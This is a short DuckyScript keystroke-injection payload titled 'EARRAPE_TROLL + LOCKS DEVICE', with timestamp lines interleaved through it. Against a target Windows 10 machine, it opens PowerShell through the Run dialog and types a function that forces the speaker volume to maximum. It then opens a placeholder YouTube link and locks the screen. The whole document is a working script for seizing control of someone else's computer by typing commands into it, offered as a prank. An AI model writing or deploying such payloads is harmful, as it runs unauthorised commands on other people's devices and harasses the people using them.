2022-11-09 03:50:07 +00:00
REM Title: EARRAPE_TROLL + LOCKS DEVICE
REM Creator: Grim<3
REM What this script does is open powershell runs a command that makes the targets volume to max locks the targets device and plays song or sound from a youtube link
REM For: Win10 (will use default browser)
GUI R
2022-11-10 02:40:09 +00:00
DELAY 1000
2022-11-09 03:50:07 +00:00
STRING Powershell.exe
ENTER
2022-11-10 02:40:09 +00:00
DELAY 1000
2022-11-09 03:50:07 +00:00
STRING Function Set-Speaker($Volume){$wshShell = new-object -com wscript.shell;1..50 | % {$wshShell.SendKeys([char]174)};1..$Volume | % {$wshShell.SendKeys([char]175)}}
ENTER
2022-11-10 02:40:09 +00:00
DELAY 2000
2022-11-09 03:50:07 +00:00
STRING Set-Speaker -Volume 50
ENTER
2022-11-10 02:40:09 +00:00
DELAY 2000
2022-11-09 03:50:07 +00:00
STRING start YOUR YOUTUBE LINK WITH THE HTTPS://
ENTER
2022-11-10 02:40:09 +00:00
DELAY 4000
2022-11-09 03:50:07 +00:00
GUI L